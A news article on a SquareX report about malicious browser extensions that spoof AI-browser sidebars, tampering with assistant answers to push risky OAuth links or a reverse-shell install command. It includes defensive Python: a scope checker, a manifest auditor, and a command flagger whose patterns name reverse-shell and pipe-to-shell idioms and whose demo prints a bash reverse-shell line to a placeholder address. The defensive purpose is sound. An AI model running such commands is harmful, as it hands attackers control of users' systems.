A new breed of web browsers powered by artificial intelligence is emerging, but cybersecurity professionals caution that threat actors could exploit this cutting-edge technology. SquareX, a prominent security firm, released an alarming report on Thursday detailing vulnerabilities in AI browsers. The report emphasizes how rogue browser extensions can hijack AI-driven sidebars to deceive users and potentially compromise enterprise networks.

Rogue extensions target AI browser sidebars

SquareX’s research reveals that cybercriminals now possess the ability to create convincing fake AI sidebars that mimic legitimate ones users depend on for handling queries. While appearing authentic, these malicious sidebars can divert unsuspecting individuals to unsafe websites, pilfer confidential information, or even covertly install backdoors.

The cybersecurity company notes that the approach is not entirely novel, since malicious extensions have long plagued browsers like Chrome and Firefox. AI browsers, such as OpenAI's recently launched Atlas, are equally susceptible.

By deploying harmful JavaScript code, attackers can overlay a realistic fake sidebar. When a query is submitted, the malicious extension manipulates the output to incorporate dangerous instructions. For example, a simple request for file-sharing recommendations might return a malicious link that requests high-risk OAuth permissions, potentially granting hackers access to the victim’s emails or cloud accounts.
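To make the OAuth risk concrete, the following is a minimal sketch of how a defender might inspect a consent link before a user follows it. It is not taken from the SquareX report. The function name `risky_scopes` and the contents of `HIGH_RISK_SCOPES` are illustrative assumptions, and a real policy would list the scopes that matter for the organization's own identity provider.

```python
from urllib.parse import urlparse, parse_qs

# Assumption: an illustrative deny-list of broad scopes (full Gmail and
# full Google Drive access). A real policy would be maintained per provider.
HIGH_RISK_SCOPES = {
    "https://mail.google.com/",
    "https://www.googleapis.com/auth/drive",
}


def risky_scopes(consent_url: str) -> list[str]:
    """Return the high-risk scopes requested by an OAuth consent URL."""
    query = parse_qs(urlparse(consent_url).query)
    requested: set[str] = set()
    # OAuth 2.0 encodes multiple scopes as one space-delimited string.
    for value in query.get("scope", []):
        requested.update(value.split())
    return sorted(requested & HIGH_RISK_SCOPES)


if __name__ == "__main__":
    link = (
        "https://auth.example.com/authorize?client_id=demo"
        "&scope=https%3A%2F%2Fmail.google.com%2F+openid"
    )
    print(risky_scopes(link))
```

A check like this only catches scopes that are already on the list, so it complements, rather than replaces, provider-side controls over which apps may request which permissions.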

SquareX researchers conducted a disturbing test demonstrating how a compromised extension could surreptitiously modify installation instructions for a widely used tool like Homebrew. The altered command secretly opened a reverse shell, effectively handing over complete control of the victim’s system to the attackers.

Experts advocate for a zero-trust approach

Ed Dubrovsky, chief operating officer at Cypfer, an incident response firm, urges corporate decision-makers to reevaluate their approach to AI-powered tools.

“Establish guardrails around AI use and functionality,” Dubrovsky advised. “If you’re allowing AI-vulnerable software into your corporate network, segment it into a place where it can’t access your digital crown jewels or even be aware of their existence.”

He stressed the importance of subjecting AI to rigorous zero-trust security models. Unlike conventional software, AI behaves more like “100 new employees with minimal vetting,” making its actions difficult to anticipate or control, Dubrovsky explained.

Furthermore, he highlighted that AI extends beyond language-based chat, with many systems now capable of executing tasks, deploying code, and operating autonomously. This introduces a new attack surface where AI, not just humans, can enter commands.

“The risk is that AI is not, and likely never will be, infallible,” Dubrovsky added. “AI may one day avoid most human attempts at deception, but can it prevent manipulation by other AI?”

‘Dumpster fires’ on the horizon

Other experts are blunter about the swift adoption of AI browsers. David Shipley, CEO of Beauceron Security, a Canadian cybersecurity company, pulled no punches when addressing the risks.

“If CISOs are bored and want to spice up their lives with an incident, they should roll out these AI-powered hot messes to their users,” Shipley quipped. “But if they’re like most CISOs with plenty of problems already, they should steer clear of these dumpster fires [AI browsers] at all costs.”

Shipley argued that even tech giants like Apple, Google, and Microsoft continue to grapple with malicious extensions despite years of investment, suggesting that AI browsers are built on shaky ground.

“It’s a mistake to think the risk is limited to extensions,” he said. “The fundamental DNA of these browsers is flawed. Companies lack the incentive to pay sufficient attention to the problems, and bad extensions are merely the straw that breaks cybersecurity’s back.”



Unveiling the spoofing process

The SquareX report outlines the deceptively simple process of AI sidebar spoofing. Once a malicious extension is installed, it lies in wait for the user to open an AI-enabled browser tab. The extension then generates a fake sidebar overlay that closely resembles the trusted AI assistant.

As users enter queries into this counterfeit sidebar, the extension relays them to an AI engine while altering the output. This enables attackers to inject malicious links, misleading instructions, or commands that bypass security measures.

The peril is compounded because malicious extensions are frequently disguised as beneficial utilities, such as password managers, productivity tools, or even AI writing assistants. Attackers propagate these extensions through phishing campaigns, social media, and even by uploading them to official web stores.
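Because a spoofed sidebar depends on an extension being able to inject content into pages, one possible triage step is to review what each installed extension is allowed to touch. The sketch below reads a Chrome-style `manifest.json` and lists broad grants. The function name `audit_manifest` and the two policy sets are assumptions made for illustration, not recommendations from the report, and many legitimate extensions would also be flagged.

```python
import json

# Assumption: permissions and match patterns treated as "broad" for triage.
BROAD_PERMISSIONS = {"scripting", "tabs", "webRequest"}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def audit_manifest(manifest_text: str) -> list[str]:
    """List broad permissions and host access declared in an extension manifest."""
    manifest = json.loads(manifest_text)
    findings: list[str] = []
    for perm in manifest.get("permissions", []):
        # Skip non-string entries rather than guessing at their meaning.
        if isinstance(perm, str) and (perm in BROAD_PERMISSIONS or perm in BROAD_HOSTS):
            findings.append(f"permission: {perm}")
    for host in manifest.get("host_permissions", []):
        if host in BROAD_HOSTS:
            findings.append(f"host access: {host}")
    for script in manifest.get("content_scripts", []):
        for pattern in script.get("matches", []):
            if pattern in BROAD_HOSTS:
                findings.append(f"content script on: {pattern}")
    return findings


if __name__ == "__main__":
    sample = json.dumps({
        "manifest_version": 3,
        "permissions": ["storage", "scripting"],
        "host_permissions": ["<all_urls>"],
    })
    for finding in audit_manifest(sample):
        print(finding)
```

The output is a starting point for human review, since broad access alone does not show that an extension is malicious.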

Proactive measures for organizations

SquareX recommends that security teams implement more stringent browser-native policies, including:

- Employing machine learning and page analysis to block phishing websites.

- Preventing high-risk permissions from being granted to unapproved apps.

- Flagging or blocking hazardous Linux commands delivered via AI sidebars.
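The last recommendation can be illustrated with a minimal pattern-based sketch, assuming the security tool can see the command text before the user runs it. The patterns and the name `flag_command` are hypothetical and far from exhaustive. They cover a few well-known reverse-shell and remote-execution idioms and would miss obfuscated variants.

```python
import re

# Assumption: a small, illustrative set of patterns. Real tooling would need
# a much broader and regularly updated rule set.
SUSPICIOUS_PATTERNS = {
    "reverse shell via /dev/tcp": re.compile(r"/dev/tcp/"),
    "netcat with exec flag": re.compile(r"\b(?:nc|ncat|netcat)\b[^|;&]*\s-e\b"),
    "download piped to shell": re.compile(
        r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"
    ),
    "base64 decoded into shell": re.compile(
        r"base64\s+(?:-d|--decode)\b[^|]*\|\s*(?:ba|z)?sh\b"
    ),
}


def flag_command(command: str) -> list[str]:
    """Return the labels of every suspicious pattern found in a shell command."""
    return [
        label
        for label, pattern in SUSPICIOUS_PATTERNS.items()
        if pattern.search(command)
    ]


if __name__ == "__main__":
    # 203.0.113.5 is a documentation-only address used as a placeholder.
    print(flag_command("bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"))
    print(flag_command("ls -la"))
```

A tool could warn on any non-empty result and block outright on the reverse-shell patterns, leaving the final decision on ambiguous cases to the user or an administrator.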

Gabrielle Hempel, a security strategist at Exabeam, described the findings as “a warning shot for the early days of agentic browsing.”

“The main issue here is that agentic-AI browsers introduce an entirely new attack surface,” Hempel explained. “This attack, involving a malicious extension injecting a fake AI sidebar overlay that looks authentic, allows threat actors to hijack the ‘trusted’ AI assistant UI and trick users into executing dangerous operations.”

She urged organizations to limit AI browsers from performing high-risk tasks until vendors can demonstrate their safety. Any productivity tool requesting extensive permissions should be heavily scrutinized, Hempel added.

“Segmentation is also crucial once these tools are implemented,” Hempel said. “The principle of least privilege applies here, and AI interaction with certain tabs or services should be restricted.”

A mounting challenge for CISOs

The message for IT leaders is unambiguous. Employees can easily be duped into installing malicious extensions. Once installed, these extensions can masquerade as trusted AI assistants and manipulate outputs in ways that may evade detection by traditional security tools.

While AI browsers may be touted as pioneering technology, without more robust controls, they could end up serving the interests of attackers rather than users. As experts warn, the trust model underpinning these new browsing experiences requires a complete overhaul before enterprises can rely on them securely.

The emergence of AI browsers presents both exciting possibilities and daunting security challenges. As this technology rapidly evolves, organizations must approach it with caution and implement comprehensive safeguards.

